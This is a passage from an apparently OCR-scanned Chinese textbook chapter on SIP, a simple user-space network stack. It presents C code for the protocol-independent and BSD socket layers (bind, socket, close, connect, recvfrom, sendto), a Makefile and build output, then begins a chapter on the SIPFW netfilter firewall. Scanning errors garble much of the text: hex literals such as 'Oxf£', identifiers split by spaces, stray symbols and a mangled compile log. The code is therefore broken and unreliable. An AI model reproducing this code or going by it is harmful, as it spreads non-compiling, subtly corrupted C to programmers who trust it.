acc. = ((ace & Oxf£) << 08) | ((ace & Oxff00U0L) >> 6) 
} 
} 
if (swapped) 
{ 
acc = ((acc & Oxff) << 8) | ((acc & Oxff00UL) >> 8); 
1 


acc += (src->s addr & 0xffffUL) 

acc += ((src->s addr >> 16) & OxffffUL); 
acc += (dest->s addr & OxffffUL); 

acc += ((dest->s addr >> 16) & OxffffUL); 
acc += ( u32)htons(( ul6)proto); 

acc += ( u32)htons (Proto len); 

while ((acc >> 16) != 0) 


{ 

acc = (acc & OxffffUL) + (acc >> 16); 
} 
return ( ul6)~(acc & OxffffUL); 


19.9 SIP 网 络 协议 栈 的 协议 无 关 层 


SIP 网 络 协议 栈 的 协议 无 关 层 的 作用 是 隔离 多 种 网 络 协议 类 型 在 同一 层 上 兼容 ， 为 
户 接口 提供 一 个 中 间 层 ， 便 于 用 户 接口 的 实现 。 协 议 无 关 层 的 接口 是 协议 无 关 的， 在 协议 
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的 实现 内 部 对 不 同 的 协议 进行 兼容 。 


19.9.1 SIP 协议 无 关 层 的 系统 架构 


-个 简单 网 络 协议 栈 的 例子 SIP 


SIP 网 络 协议 栈 的 协议 无 关 层 以 结构 struct sock 为 中 心 ， 对 网 络 连接 状态 进行 设置 和 
维护 。 结 构 sock 的 代码 定义 如 下 ， 主 要 包含 协议 控制 块 部 分 、 接 收 缓冲 区 链表 和 接收 控制 


参数 、 应 用 层 接口 映射 的 参数 。 


struct sock { 
int type; 
int state; 
union 
{ 
struct ip pcb *ip; 
struct tcp_ pcb *tcp; 
struct udp pcb *udp; 
b Dob 
int err; 
struct skbuff *skb_ recv; 
Sem t sem recv; 
int socket; 
int recv timeout; 
_ul6 recv avail; 
ba 


19.9.2 SIP 协议 无 关 层 的 函数 形式 


/* 协 议 类 型 */ 
/* 协 议 的 状态 */ 


/*IP 层 的 控制 结构 */ 
/*TCP 层 的 控制 结构 */ 
/*UDP 的 控制 结构 */ 


/* 错 误 值 */ 

/* 接 收 缓冲 区 */ 

/* 接 收 缓冲 区 计数 信号 量 */ 

/* 这 个 sock 对 应 的 文件 描述 符 值 */ 
/* 接 收 数据 超时 时 间 */ 

/* 可 以 接收 数据 */ 


协议 无 关 层 的 函数 包括 类 似 socket()、connect()、bind()、send()、recv() 等 函数 ， 不 过 


在 实现 的 时 候 各 种 不 同 的 协议 调用 不 同 模块 内 的 函数 。 


例如 下 面 的 代码 是 对 bind0) 的 函数 


协议 无 关 层 实现 ， 按 照 结构 struct sock 中 type 的 类 型 不 同调 用 不 同 协议 模块 中 的 函数 ， 实 
现 不 同 协议 用 同一 个 函数 形式 的 实现 ， 例 如 对 于 原始 套 接 字 SOCK RAW， 会 调 用 
SIP_RawBind() 函 数 ， 对 于 数组 包 套 接 字 SOCK DGRAM 会 调用 SIP_UDPBind() 函 数 ; 对 
于 流 式 套 接 字 SOCK_STREAM， 会 调用 SIP_TCPBind0) 函 数 。 


int SIP_ SockBind(struct sock *sock, struct in addr *#addr, _ ul16 port) 


{ 


if (sock->pcb.tcp != NULL) 


{ 
switch (sock->type) 
| 
case SOCK RAW: 
break; 
case SOCK DGRAM: 


sock->err = SIP UDPBind(sock->pcb.udp, addr, port); 


break; 


Case SOCK STREAM: 


break; 
default: 
break; 
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协议 无 关 层 中 其 他 函数 的 实现 也 是 采用 这 种 方式 来 实现 的 。 
19.9.3 SIP 协议 无 关 层 的 接收 数据 函数 


SIP 网 络 协议 栈 中 的 网 络 无 关 层 数 据 接收 是 从 结构 sock 中 的 接收 缓冲 区 skb_recv 上 摘 
除数 据 ， 当 网 络 数据 到 来 的 时 候 ， 会 将 接收 到 的 网 络 数据 挂 接 在 这 个 链表 上 。 为 了 让 应 用 
层 能 够 方便 地 获取 网 络 数据 ， 如 图 19.27 所 示 ，UDP 层 与 协议 无 关 层 关于 接收 数据 的 互 斥 
控制 过 程 如 下 : 

口 接收 缓冲 区 链表 skb_recv 上 保存 了 接收 到 的 网 络 数据 ， 当 没有 网 络 数据 的 时 候 ， 这 


个 链表 为 空 。UDP 层 的 SIP_UDPInput() 函 数 向 这 个 链表 上 挂 接 网 络 数据 :协议 无 关 
层 的 函数 SIP_SockRecv0 从 这 个 链表 上 获取 网 络 数据 。 放 入 链表 中 数据 之 后 ， 控 制 
链表 的 信号 量 sem_recv() 函 数 增加 ， 从 链表 上 取得 数据 后 ，sem_recv() 函 数 减少 。 


口 函数 SIP_SockRecv() 在 发 现 信 号 量 sem_recv 的 值 不 大 于 0 后 ， 进 行 超时 等 待 ， 直 


到 网 络 数据 到 来 或 者 超时 时 间 到 达 。 


UDP 层 
UDP 层 sem _timewait 
UDP 网 络 数据 到 来 全 
SIP_UDPInput 


图 19.27 接收 数据 的 信号 量 锁定 方式 


协议 无 关 层 的 网 络 数据 接收 函数 SIP_SockRecv() 的 实现 代码 如 下 : 


struct skbuff *SIP SockRecv(struct sock *sock) 


1 


struct skbuff *skb recv = NULL; 
int num =0; 
if(sem getvalue(&sock->sem recv, &num)) /* 获 得 信号 量 的 值 */ 
{ /* 没 有 接收 到 网 络 数据 */ 
struct timespec timeout ; 
timeout.tv_sec = sock->recv_timeout; ”/* 超 时 时 间 为 sock 结构 中 设置 */ 
timeout.tv nsec = 0; 
sem timedwait (&sock->sem recv，&timeout) ; /* 超 时 等 待 网 络 数据 的 到 来 */ 
} 
else 
{ 
sem wait (&sock->sem recv); /* 已 经 有 数据 , 直接 获取 数据 */ 
} 
Skb recv = sock->skb recv; /* 获 得 接收 缓冲 区 的 指针 头 部 */ 
if(skb recv == NULL) 
return NULL; 
sock->skb_recv = skb_recv->next;/* 将 头 部 的 网 络 数据 单元 从 接收 缓冲 区 上 摘除 */ 


Skb_recv->next = NULL; 
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return skb recv; /* 返 回 一 个 网 络 结构 */ 


19.10 SIP 网 络 协 议 栈 的 BSD 接口 层 


SIP 网 络 协议 栈 使 用 协议 无 关 层 的 代码 已 经 可 以 进行 应 用 程序 的 设计 和 代码 实现 ， 但 
是 目前 程序 设计 人 员 的 网 络 设计 基础 知识 都 是 基于 BSD 的 网 络 接口 函数 , 为 了 方便 用 户 的 
程序 设计 ，SIP 网 络 协 议 栈 包含 一 层 BSD 兼容 的 用 户 接口 层 。 


19.10.1 SIP 用 户 接口 层 的 架构 


BSD 兼容 的 接口 层 的 主要 设计 方法 都 是 围绕 结构 struct sip_socket 来 实现 的 , 其 代码 的 
实现 如 下 所 示 。 主 要 包含 协议 无 关 层 的 sock， 它 与 sip_socket 是 一 对 一 的 关系 ; lastdata 是 
最 后 接收 到 的 网 络 数据 指针 ; lastoffset 用 于 表达 lastdata 中 的 网 络 数 据 偏 移 量 , 这 是 由 于 网 
络 数据 比 应 用 层 的 缓冲 区 大 ， 不 能 全 部 复制 到 用 户 的 缓冲 区 ， 只 好 将 网 络 数据 的 位 置 进 行 
记录 方便 后 来 进行 的 复制 操作 。 


struct sip socket 


{ 


/* 协 议 无 关 层 的 结构 指针 ,一 个 socket 对 应 一 个 sock */ 
struct sock *sock; 


/* 最 后 接收 的 网 络 数 据 */ 
struct skbuff *lastdata; 
/* 接 收 的 网 络 数据 偏 移 量 , 这 是 由 
于 不 能 一 次 将 网 络 数据 复制 给 用 户 造成 的 */ 
_ ul16 lastoffset; 
/* 错 误 值 */ 
int "ores 
}; 


19.10.2 SIP 用 户 接口 层 的 套 接 字 建立 函数 


套 接 字 的 创建 函数 实现 代码 如 下 ， 这 个 函数 的 实现 按照 BSD 类 型 的 socket(O) 函 数 的 定 
义 ， 可 以 按照 给 定 的 domain 、type 和 protocol 建立 套 接 字 描 述 符 ， 当 然 其 不 能 支持 那么 多 
的 协议 ， 仅 实现 了 数据 包 套 接 字 。 

函数 对 用 户 的 类 型 和 协议 进行 判断 ， 如 果 目 前 SIP 还 不 支持 ， 则 直接 退出 。 如 果 SIP 
支持 的 协议 , 例如 数据 包 类 型 的 协议 , 则 调用 协议 无 关 层 的 函数 ， 由 无 关 层 的 函数 来 与 SIP 
协议 栈 的 具体 实现 挂 接 。 在 调用 协议 无 关 层 之 后 ， 会 返回 一 个 描述 这 个 连接 的 结构 指针 ， 
要 将 这 个 结构 指针 与 一 个 整 型 的 文件 描述 符 对 应 ， 需 要 进行 映射 ， 这 里 使 用 了 一 个 
alloc socket() 函 数 将 映射 进行 建立 。 


int sip_socket (int domain, int type, int Protocol) 


{ 


struct sock *sock; 

int i = 0; 

if(domain != AF INET || protocol != 0) /* 协 议 类 型 不 对 */ 
return = 13 
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switch (type) /* 按 照 类 型 建立 不 同 的 套 接 字 */ 
{ 
case SOCK DGRAM: /* 数 据 报 类 型 */ 
Sock = (struct sock *+)SIP SockNew( SOCK DGRAM); 
/* 建 立 套 接 字 */ 
break; 
case SOCK STREAM: /* 流 式 类 型 */ 
break; 
default: 
return -1; 
} 
if (!sock) { /* 建 立 套 接 字 失败 */ 
return -1; 
n 
i = alloc socket (sock); /* 初 始 化 socket 变量 , 并 分 配 文件 描述 符 */ 
if (i == -1) { /* 上 述 操 作 失 败 */ 
SIP_SockDelete (sock); /* 释 放 sock 类 型 变量 */ 
return -1; 
上 
sock->socket = i; /* 设 置 sock 结构 中 的 socket 值 */ 
return i; 


} 


19.10.3 SIP 用 户 接口 层 的 套 接 字 关闭 函数 


SIP 网 络 协议 栈 的 用 户 接口 层 的 套 接 字 关 闭 函 数 是 sip_close0, 函数 的 作用 是 释放 套 接 
字 占 用 的 资源 ， 抛 弃 未 用 的 网 络 数据 ， 并 将 一 些 参数 进行 置 空 操作 。 函 数 sip_close() 的 实 
现代 码 如 下 : 


int sip close(int s) 
{ 
struct sip_socket *socket; 
socket = get socket(s); /* 获 得 socket 类 型 映射 */ 
if (!socket) /* 失 败 */ 
{ 
return 一 】 5 
} 
SIP_SockDelete (socket->sock); /* 释 放 sock 结构 */ 
if (socket->lastdata) 
‘ 


skb free (socket->lastdata); /* 释 放 socket 上 挂 接 的 网 络 数 据 */ 
} 
socket->lastdata = NULL; /* 清 空 socket 结构 的 网 络 数据 */ 
socket->sock S NODL? /* 清 空 sock 指针 */ 


return 0; 


19.10.4 SIP 用 户 接口 层 的 套 接 字 绑 定 函 数 


SP 网 络 协议 栈 的 绑 定 函数 是 sip_bind0， 其 参数 与 BSD 类 型 参数 的 含义 相同 。 函 数 
的 实现 先 查 找 套 接 字 文件 描述 符 对 应 的 网 络 连接 描述 符 ， 然 后 使 用 网 络 无 关 层 的 
SIP_SockBind() 函 数 来 实现 具体 的 绑 定 操作 。 其 实现 的 参考 代码 如 下 : 
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int sip bind(int sockfd, 
const struct sockaddr *my addr, 
socklen t addrlen) 


struct sip socket *socket; 
struct in addr local addr; 
_ul6 port local; 
int err; 
socket = get socket (sockfd); /* 获 得 socket 类 型 映射 */ 
if (!socket) 
return -1; 
local addr.s addr = ((struct sockaddr in *)my addr)->sin addr.s addr; 


port local = ((struct sockaddr in *)my addr)->sin port; 

err = SIP_ SockBind(socket->sock, &local addr, ntohs (port local)); 
/* 协 议 无 关 层 的 绑 定 函数 */ 

if (err != 0) 


E 


return -17 


} 


return 0; 


19.10.5 SIP 用 户 接口 层 的 套 接 字 连 接 函 数 


与 之 前 的 函数 实现 类 似 ，SIP 的 connect() 函 数 实现 也 是 在 调用 get_socket() 函 数 获得 文 
件 描述 符 映 射 的 结构 socket 之 后 , 调用 网 络 无 关 层 的 连接 函数 SIP_SockConnect() 实 现 网 络 
的 连接 。 其 实现 代码 如 下 : 


int sip connect (int sockfd, 
const struct sockaddr *serv_addr, 
socklen 七 addrlen) 


struct sip_ socket *socket; 
int erry 
socket = get socket (sockfd) ; /* 获 得 socket 类 型 映射 */ 
if (!socket) 
return -1; 
struct in addr remote addr; 
_ ul6 remote port; 
remote addr.s addr = ((struct sockaddr in *#)serv addr)->sin addr.s_ 
addr; 
remote port = ((struct sockaddr in *)serv addr)->sin port; 
err = SIP_SockConnect (socket->sock, &remote addr, ntohs (remote port)); 
return 0; 


19.10.6 SIP 用 户 接口 层 的 套 接 字 接 收 数据 函数 


SIP 网 络 协议 栈 的 网 络 数据 接收 相对 比较 复杂 。 网 络 数据 在 底层 协议 中 是 不 用 阻塞 的 ， 
即 网 络 数据 接收 到 之 后 ， 可 以 一 直 进 行 处 理 直 到 等 待 用 户 的 接收 操作 :而 用 户 的 接收 操作 
有 可 能 发 生 阻 寨 ， 即 在 没有 网 络 数据 到 来 的 时 候 需 要 等 待 网 络 数据 。 

在 SIP 的 应 用 层 接 口 部 分 ， 将 网 络 数据 挂 接 在 一 个 接收 缓冲 区 上， 这 个 缓冲 区 仅 有 一 
个 skbuff 结构 类 型 的 变量 ， 每 次 读 取 数 据 的 时 候 ， 先 查看 这 个 指针 上 是 否 有 没有 使 用 完毕 
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的 数据 ， 如 果 有 就 从 这 个 指针 上 进行 操作 ， 将 数据 复制 出 来 如果 没 有 则 调用 网 络 无 关 层 
的 SIP_SockRecv0) 函 数 接收 数据 ; 当 接 收 数据 完毕 后 ， 将 指针 lastdata 置 空 。 

在 将 网 络 数据 复制 到 用 户 提供 的 缓冲 区 中 的 时 候 ， 需 要 判断 用 户 的 缓冲 区 与 网 络 数据 
的 长 度 相 比 ， 是 否 够 用 ， 如 果 用 户 缓冲 区 的 大 小 比 网 络 数据 的 长 度 要 大 ， 即 可 以 将 网 络 数 


据 全 部 复制 ， 则 在 网 络 数据 复制 完毕 后 ， 置 空 网 络 数据 指针 ;如 果 网 络 数据 的 长 度 比 用 户 
缓冲 区 要 大 ， 则 将 网 络 缓冲 区 中 数据 的 一 部 分 复制 进 用 户 提供 的 缓冲 区 ， 为 了 方便 下 一 次 
的 操作 ， 参 数 lastoffset 记录 了 最 后 一 次 的 复制 数据 的 位 置 ， 每 次 复制 的 时 候 要 对 这 个 参数 
进行 更 新 ， 保 证 这 个 参数 中 的 值 的 正确 性 。 接 收 的 代码 实现 如 下 : 


ssize t sip recvfrom(int s, void *buf, size t len, int flags, 


{ 


} 


struct sockaddr *from, socklen 七 *fromlen) 


struct sip socket *socket; 


struct skbuff *SKkb; 

struct sockadd in *f = (struct sockadd in *)from; 

int len copy = 0; 

socket = get socket(s); /* 获 得 socket 类 型 映射 */ 


if (!socket) 
return -1; 


if(!socket->lastdata) { /*1lastdata 中 没有 剩余 数据 */ 

socket->lastdata =(struct skbuff*) SIP SockRecv (socket->Ssock) 
/* 接 收 数据 */ 

socket->lastoffset = 0; /* 偏 离 量 为 0*/ 

skb = socket->lastdata; /*skbuff 指针 */ 

/* 填 充 用 户 出 入 参数 */ 

*fromlen = sizeof (struct sockaddr in); /* 地 址 结构 长 度 #/ 

f->sin famliy = RE INET; /* 地 址 类 型 */ 


f->sin addr.s addr = skb->nh.iph->saddr; /* 来 源 IP 地 址 */ 
f->sin port = skb->th.udph->source; /* 来 源 端 口 */ 
len copy = skb->len - socket->lastoffset;/* 计 算 lastdata 中 剩余 的 数据 */ 
if(len > len copy) { /* 用 户 缓冲 区 可 以 放下 所 有 数据 */ 
memcpy (buf, /* 全 部 复制 到 用 户 缓冲 区 */ 
Skb->datatsocket->lastoffset, 
len copy); 


skb free(skb); /* 释 放 此 结构 #/ 
socket->lastdata = NULL; /* 清 空 网 络 数据 结构 指针 */ 
socket->lastoffset = 0; /* 偏 移 量 重新 设置 为 0*/ 
Jelse{ /* 用 户 缓冲 区 放 不 下 整个 数据 */ 
len copy = len; /* 仅 复制 缓冲 区 大 小 的 数据 */ 
memcpy (buf， /* 复 制 */ 
skbt+socket->lastoffset, 
len copy); 
socket->lastoffset += len copy; /* 偏 移 量 增加 */ 
和 
return len copy; /* 返 回复 制 的 值 */ 


19.10.7 ”SIP 用 户 接口 层 的 发 送 数据 函数 
SIP 网 络 协议 栈 的 用 户 接口 层 发 送 数据 的 函数 代码 如 下 所 示 。 发 送 函 数 的 名 称 为 
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sip_sendto()， 其 中 的 参数 含义 与 BSD 的 参数 含义 相同 。 函 数 的 实现 过 程 如 下 : 
(1) 根据 用 户 输入 的 数据 长 度 ， 申 请 结构 skbu 人 ff 的 内 存 空间 。 
(2) 设置 结构 skbu 企 的 指针 位 置 。 
(3) 将 用 户 数据 复制 到 skbu 任 结构 中 。 
(4) 设置 发 送 的 目的 地 址 。 
(5) 调用 get_socket() 函 数 ， 获 得 套 接 字 描 述 符 的 对 应 结构 。 
(6) 调用 网 络 无 关 层 的 SIP_SockSendTo() 函 数 发 送 网 络 数据 。 


ssize t sip sendtol(lint s， 
const void *buf, 
size t len, 
int flags, 
const struct sockaddr *to, 
socklen 七 tolen) 


struct sip socket *socket; 

struct in addr remote addr; 

struct sockaddr in* to in = (struct sockaddr in*)to; 

/* 网 络 数据 头 部 的 长 度 */ 

int 1 head = sizeof(struct sip ethhdr) + sizeof(struct sip iphdr) + 
sizeof(struct sip_udphdr) 


int size = 1 head + len; /* 数 据 总 长 度 */ 

struct skbuff *skb = skb alloc( size); /* 申 请 空间 */ 

char* data = skb put(skb, 1 head); /* 设 置 data 指针 */ 
memcpy (data, buf, len); /* 将 用 户 数据 复制 到 缓冲 区 */ 
remote addr =to in->sin addr; /* 设 置 目的 IP 地 址 */ 


socket = get socket(s); 
if (!socket) 
return -1; 
SIP SockSendTo(socket->sock, skb, &remote addr, to in->sin port); 
/* 发 送 数 据 */ 


return len; 


19.11 SIP 网 络 协议 栈 的 编译 


前 面 的 几 节 中 对 SIP 网 络 协议 栈 的 实现 机 制 和 代码 进行 了 详细 的 分 析 ， 本 节 将 对 SIP 
网 络 协议 栈 的 文件 架构 进行 介绍 ， 并 编译 运行 SIP 网 络 协议 栈 。 


19.11.1 SIP 的 文件 结构 


SIP 网 络 协议 栈 分 为 如 下 的 多 个 文件 。 

口 sip.c: SIP 网 络 协议 栈 的 主 控 程序 ， 用 户 线程 和 SIP 网 络 协议 栈 的 线程 都 在 这 个 文 
件 中 。 

sip_skbuff.c: SIP 网 络 协议 栈 的 网 络 数据 缓冲 区 数据 处 理 函 数 接口 实现 代码 。 
sip_ether.c: SIP 网 络 协议 栈 的 网 络 接口 层 。 

sip_arp.c: SIP 网 络 协议 栈 的 ARP 协议 实现 代码 。 

sip_ip.c: SIP 网 络 协议 栈 的 人 P 协议 实现 代码 。 


OODODD 
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sip_icmp.c: SIP 网 络 协议 栈 的 ICMP 协议 实现 代码 。 

sip_udp.c: SIP 网 络 协议 栈 的 UDP 协议 实现 代码 。 

sip_socket.c: SIP 网 络 协议 栈 的 用 户 接口 代码 实现 。 

头 文件 有 sip arp.h、sip.h、sip_skbuff.h、sip_socket.h、sip_udp.h、sip_ether.h、 
sip_icmp.h、 sip_ip.h。 


19.11.2 SIP 的 Makefile 
SIP 网 络 协议 栈 的 Makefile 文件 内 容 如 下 ， 最 后 生成 可 执行 文件 sip。 
CC = gcc 


TARGET = sip ether.o sip skbuff.o sip arp.o sip ip.o sip icmp.o sip udp.o 
sip.o sip_sock.o sip_socket.o 


#sip_arp.o 
sip:clean $ (TARGET) 

gcc -o sip $ (TARGET) -lpthread 
clean: 
rm -rf *.0 Sip .oO 
run:sip 
SS 


19.11.3 ”SIP 的 编译 运行 
编译 SIP 网 络 协议 栈 的 输出 结果 为 : 


# make 
rime 


gcc 
gcc 
gcc 
gcc 
gcc 
gcc 
gcc 
gcc 
gcc 


9 
-9 
-3 
> 
"9 
Sg 
“9 
2 
可 


*.O Sip *.O 


“eo 
-Cc 
-Cc 
王公 
= 
> 
= 
Se 
= 


~ 
= 
~ 
© 
~ 
Ge 
= 
0 
-0 


sip ether.o sip ether.c 
sip_skbuff.o sip_ skbuff.c 
sip_arp.o sip arp.c 

Sip ip.o sip ip.c 
sip_icmp.o sip_icmp.c 

sip udp.o sip udp.c 

sip.o sip.c 

sip sock.o sip sock.c 
Sip_socket.o sip_socket.c 


gcc -o sip sip ether.o sip skbuff.o sip arp.o sip ip.o sip icmp.o sip udp.o 
sip.o sip_sock.o sip_socket.o -lpthread 


运行 网 络 协议 栈 的 方式 为 直接 执行 sip: 
A 


19:12. -als 结 


本 章 对 一 个 简单 的 应 用 层 实现 的 网 络 协议 栈 的 实现 进行 了 介绍 ，S 了 PP 网 络 协议 栈 主要 
包含 如 下 儿 个 方面 : 


口 


“618。 


使 


j skbuff 结构 作为 存储 缓冲 区 控制 网 络 数据 的 接收 、 发 送 ， 在 各 层 之 间 传 递 数 


据 ， 将 网 络 协议 栈 的 各 层 连接 起 来 。 这 种 结构 在 UNIX 中 采用 的 是 mbuf， 流 传 比 
较 广泛 的 嵌入 式 协议 栈 LWIP 采用 了 pbuf 结构 ， 为 了 和 Linux 相 一 致 ， 采 用 了 和 
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Linux 内 核 协议 栈 相同 的 名 称 ， 以 及 类 似 的 名 称 结构 和 控制 方法 ， 但 数据 的 组 织 六 
式 是 不 同 的 。 

口 为 了 在 应 用 层 实 现 SIP 网 络 协议 栈 ， 采 用 了 SOCK PACKET 类 型 的 网 络 协议 从 
Linux 内 核 的 网 卡 中 直接 将 网 络 数据 取出 和 发 送 网 络 数据 。 

口 为 了 将 MAC 地 址 和 卫 地 址 进行 对 应 ，ARP 层 对 映射 表 进行 了 维护 ， 包 含 映射 项 
的 增加 、 删 除 、 查 找 等 。 

口 IP 层 的 实现 相对 比较 简单 ， 主 要 的 两 个 点 是 IP 层 网 络 数据 的 分 片 和 组 包 。 

口 UDP 协议 的 实现 与 传统 的 协议 栈 相 比 显得 简单 得 多 ， 但 是 能 够 进行 基本 的 数据 

收发 。 

口 协议 无 关 层 的 实现 方便 了 协议 的 增加 和 对 SIP 网 络 协议 栈 的 扩展 。 

口 用 户 接口 的 实现 使 用 一 个 sip_socket 接口 , 将 用 户 的 套 接 字 与 协议 栈 内 部 的 网 络 连 

接 对 应 起 来 。 而 selectO0 函 数 、fecntt0 和 ioctlO 函 数 的 实现 仅仅 有 一 个 雏形 ， 需 要 进 
一 步 细 化 。 

由 于 SIP 是 在 应 用 层 实现 的 ， 所 以 协议 栈 的 使 用 和 应 用 程序 之 间 使 用 的 线程 模式 。 这 
主要 是 因为 线程 模式 方便 协议 栈 和 用 户 数据 之 间 的 通信 。 

网 络 协议 栈 SIP 还 十 分 简单 , 它 甚至 不 能 正常 运行 , 一 些 协议 的 实现 十 分 简单 和 武断 ， 
没有 进行 兼容 性 的 扩展 , 而 最 复杂 的 TCP 协议 还 没有 加 入 。 但 是 它 作为 一 个 在 应 用 层 实现 
的 网 络 协议 栈 ， 用 于 学 习 网 络 协议 栈 的 架构 和 研究 比较 复杂 的 网 络 协议 栈 还 是 很 有 参考 价 
值 的 。 

SIP 显得 十 分 简陋 ， 某 些 实现 方法 还 十 分 策 拙 ， 读 者 可 以 在 此 基础 上 进行 优化 或 者 参 
考 SIP 的 代码 编写 自己 的 协议 栈 。 
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本 章 在 前 面 所 介绍 的 内 容 上 结合 新 的 知识 ， 介 绍 一 个 简单 的 网 络 防火 墙 SIPFW 的 例 
子 。 防 火 墙 SIPFW 是 Simple IP FireWall 的 简称 ， 可 以 实现 用 户 配 置 、 防 火 墙 规 则 的 增加 
删除 、 网 络 信息 记录 等 功能 。 主 要 包括 以 下 内 容 : 

口 SIPFW 防火 墙 的 需求 内 容 分 析 ， 包含 SIPFW 的 功能 描述 ， 对 防火 墙 的 功能 进行 比 

较 详 细 的 描述 ， 这 是 之 后 需求 分 析 、 模 块 设计 、 模 块 实现 的 基础 ; 

口 SIPFW 防火 墙 的 模块 设计 ， 包 含 过 滤 、 用 户 空间 和 内 核 空 间 的 交互 方法 、 规 则 的 
表达 和 操作 方法 、SIPFW 的 PROC 虚拟 文件 系统 、 配 置 文件 和 日 志文 件 的 处 理 
方法 ; 

口 SIPFW 防火 墙 的 具体 实现 代码 ， 主 要 对 各 部 分 的 核心 代码 进行 介绍 。 


20.1 SIPFW 防火 墙 的 功能 描述 


SIPFW 防火 墙 ， 即 Simple IP FireWall， 为 一 个 简单 的 Linux 平台 上 的 网 络 防火 墙 ， 利 
用 Linux 内 核 的 netfilter 模块 ， 对 从 本 主机 进出 的 网 络 数据 进行 过 滤 ， 并 可 以 通过 用 户 界 
面 进行 交互 ， 并 通过 防火 墙 的 数据 进行 记录 。 主 要 包含 如 下 功能 

口 对 进出 主机 的 网 络 数据 进行 过 滤 。 

口 用 户 与 防火 墙 之 间 的 交互 ， 设 置 过 滤 规 则 ， 过 滤 规 则 的 记录 和 读 取 。 

口 过 滤 日 志 分 析 。 


20.1.1 SIPFW 防火 墙 对 主机 进行 网 络 数据 过 滤 的 功能 描述 


防火 墙 的 功能 主要 是 对 发 送 到 本 地 和 从 本 地 发 出 的 网 络 数据 进行 拦截 工作 ， 防 火 墙 的 
拦截 功能 定义 是 指 防火 墙 对 什么 网 络 数据 进行 过 滤 、 怎 样 进行 过 滤 。 防 火 墙 SIPFW 可 以 对 
网 络 数据 进行 过 滤 ， 过 滤 规 则 如 下 : 


口 可 以 分 为 丢弃 、 通 过 ; 

口 可 以 按照 网 卡 进行 过 滤 ， 针 对 某 个 网 卡 设置 过 滤 规 则 ; 

口 可 以 按照 卫 地址 和 端口 进行 过 滤 ; 

口 可 以 按照 协议 进行 过 滤 ， 可 以 过 滤 的 协议 为 TCP、UDP、ICMP 和 IGMP。 


上 述 规则 的 含义 如 下 所 述 。 

口 丢弃 : 对 符合 规则 的 网 络 数 据 ， 网 络 协议 栈 不 进行 处 理 ，SIPFW 防火 墙 直接 将 进 
入 和 发 出 的 网 络 数据 销毁 。 

口 通过 : 对 符合 规则 的 网 络 数据 ， 可 以 通过 SIPFW 防火 墙 ， 防 火 墙 不 对 此 数据 进行 
处 理 ， 由 网 络 协议 栈 和 应 用 层 进 行 处 理 。 
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口 按照 网 卡 进行 过 滤 : 防火 墙 可 以 根据 用 户 设置 规则 制定 的 网 络 设备 进行 过 滤 ， 没 
有 指定 的 网 络 设备 ,过 滤 规 则 对 其 无 效 。 例 如 通过 网 络 设备 eth0 的 网 络 数据 丢弃 
则 通过 ethl 网 卡 的 数据 正常 进行 。 

口 按照 耻 和 端口 进行 过 滤 : 用 户 指定 过 滤 规则 的 IP 地 址 和 端口 范围 , 在 此 范围 之 内 
的 进行 过 滤 ， 不 在 此 范围 的 不 满足 某 条 过 滤 规 则 。 

口 按照 协议 进行 过 滤 : 用 户 设 定 过 滤 规 则 时 ， 可 以 指定 协议 ， 此 时 ， 用 户 设 定 的 过 
滤 规 则 仅仅 对 指定 的 协议 有 效 ， 其 他 协议 无 效 。 支 持 的 协议 包含 IGMP、ICMP、 
UDP 和 TCP。 


20.1.2 ”SIPFW 防火 墙 用 户 设置 防火 墙 规则 的 功能 描述 


防火 墙 能 够 与 用 户 进 行 交 互 是 防火 墙 的 基本 功能 ， 用 户 可 以 使 用 防火 墙 的 用 户 接口 对 
防火 墙 的 规则 进行 一 些 操作 。SIPFW 用 户 可 以 通过 命令 行 方式 进行 防火 墙 规则 的 设置 、 删 
除 、 规 则 的 显示 等 。 其 具体 含义 如 下 所 述 。 

口 规则 设置 : 用 户 按照 命令 行 的 格式 增加 防火 墙 规则 ， 用 户 设置 的 合法 规则 需要 立 

即 生 效 。 
口 规则 删除 : 用 户 可 以 根据 规则 列表 中 的 序号 等 方式 对 防火 墙 目 前 的 规则 进行 删除 。 
口 规则 的 显示 : 用 户 可 以 列 出 防火 墙 目前 的 规则 。 


20.1.3 SIPFW 防火 墙 配置 文件 等 附加 功能 的 功能 描述 


防火 墙 除了 核心 的 功能 外 ， 一 些 附加 的 功能 也 是 必需 的 。 例 如 ， 防 火 墙 启动 时 的 配置 
选项 、 对 通过 防火 墙 的 网 络 数据 的 过 滤 情 况 进行 信息 记录 等 。 

SIPFW 防火 墙 可 以 根据 用 户 设置 的 配置 文件 对 基本 的 用 户 设置 进行 读 取 , 例如 默认 的 
防火 墙 动 作 、 日 志文 件 的 记录 路 径 。 

SIPFW 防火 墙 需 要 建立 基本 的 系统 信息 获取 方法 , 使 用 PROC 虚拟 文件 系统 ， 向 用 户 
反映 基本 的 系统 设置 情况 ， 并 可 以 通过 简单 的 设置 对 防火 墙 进行 基本 的 配置 ， 例 如 默认 规 
则 、 防 火 墙 的 失效 等 。 

SIPFW 防火 墙 可 以 对 符合 用 户 设置 规则 的 网 络 数据 进行 记录 ， 方 便 用 户 查 看 ， 即 可 以 
进行 日 志 记录 ， 需 要 保存 到 文件 中 。 


20.2 ”SIPFW 需求 分 析 


要 能 够 完成 所 定义 功能 的 SIPFW 防火 墙 , 需要 对 防火 墙 的 多 个 部 分 的 需求 定义 进行 
明确 ， 包 括 防火 墙 规则 的 条 件 、 防 火 墙 的 动作 、 防 火 墙 过 滤 网 络 数据 的 类 型 和 内 容 、 防 
火 墙 链 和 链 的 处 理 、 防 火 墙 的 配置 文件 格式 、 防 火 墙 的 命令 配置 格式 、 防 火 墙 的 规则 定 
义 格 式 、 防 火 墙 的 日 志文 件 格式 ， 以 及 如 何 选择 实现 方案 。 本 节 将 对 需求 进行 初步 的 分 
析 和 明确 。 


20.2.1 SIPFW 防火 墙 条 件 和 动作 
防火 墙 的 核心 构成 是 由 条 件 和 动作 组 成 的 。 当 网 络 数据 满足 某 些 条 件 的 时 候 ， 就 执行 


“le 


对 应 的 动作 。 
条 件 即 网 络 数据 所 承载 的 信息 ， 例 如 来 源 主 机 的 IP 地 址 和 端口 地 址 、 目 的 主机 的 他 
地 址 和 目的 地 址 、 网 络 数据 中 所 采用 的 协议 类 型 ， 此 外 还 包含 网 络 协议 所 处 的 阶段 ， 例 如 
TCP 协议 的 三 次 握手 连接 阶段 、 四 次 握手 断 开 阶段 ，ICMP 中 的 类 型 和 代码 等 。 
动作 即 对 网 络 数据 的 处 理 方式 。 例 如 通常 所 采用 的 接受 、 丢 弃 、 转 发 等 。 
口 在 SIPFW 中 接受 动作 用 ACCEPT 表示 ， 当 满足 条 件 的 网 络 数据 到 来 的 时 候 , 防火 
